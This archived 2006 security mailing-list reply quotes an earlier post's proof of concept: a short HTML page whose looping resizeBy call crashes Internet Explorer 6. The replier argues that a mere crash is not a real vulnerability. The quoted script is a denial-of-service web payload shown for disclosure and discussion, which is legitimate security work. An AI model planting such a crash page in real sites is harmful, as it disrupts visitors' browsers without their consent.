lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060529010551.05DCBDA835@mailserver7.hushmail.com>
Date: Mon May 29 02:06:11 2006
From: 0x80 at hush.ai (0x80@...h.ai)
Subject: Internet Explorer Ver 6.0.2800.1106
	vulnerability

How is a simple crash a vulnerability?  you can make IE crash 
99999999 different ways.  The trick is making it run your code.


On Fri, 26 May 2006 05:49:39 -0700 r k <kgp.143@...il.com> wrote:
>Hi All,
>
>
>IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html 
>page.
>
>the following is the code
>
>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

>+
>
><html>
><head>
><title>Internet Explorer Ver 6.0.2800.1106</title>
></head>
><body>
><script>
>  var wwidth = (window.innerWidth)?window.innerWidth: 
>((document.all
>)?document.body.offsetWidth:null);
>
>  while (wwidth)
>  {
> self.resizeBy(-999999, -1);
>  }
>
></script>
>
></body>
></html>
>
>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>tested on windows 2000,windows XP
>
>
>
>thank you
>
>antar



Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ